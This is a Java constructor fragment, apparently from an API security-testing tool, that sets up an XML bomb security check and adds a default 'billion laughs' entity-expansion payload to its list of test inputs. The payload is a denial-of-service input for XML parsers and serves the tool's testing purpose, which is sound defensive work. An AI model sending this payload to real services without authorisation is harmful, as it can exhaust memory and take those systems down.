{
  super(config,parent,icon);
  if (config == null) {
    config=SecurityCheckConfig.Factory.newInstance();
    XmlBombSecurityCheckConfig xmlbsc=XmlBombSecurityCheckConfig.Factory.newInstance();
    config.setConfig(xmlbsc);
  }
  if (config.getConfig() == null) {
    XmlBombSecurityCheckConfig xmlbsc=XmlBombSecurityCheckConfig.Factory.newInstance();
    config.setConfig(xmlbsc);
  }
  if (getAttachmentPrefix() == null)   setAttachmentPrefix(DEFAULT_PREFIX);
  if (getBombList().size() < 1) {
    getBombList().add("<!DOCTYPE lolz [\n<!ENTITY lol \"lol\">\n<!ENTITY lol2 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\n<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\n<!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">\n<!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\">\n<!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\">\n<!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\">\n<!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\">\n<!ENTITY payload \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\">\n]>");
  }
}
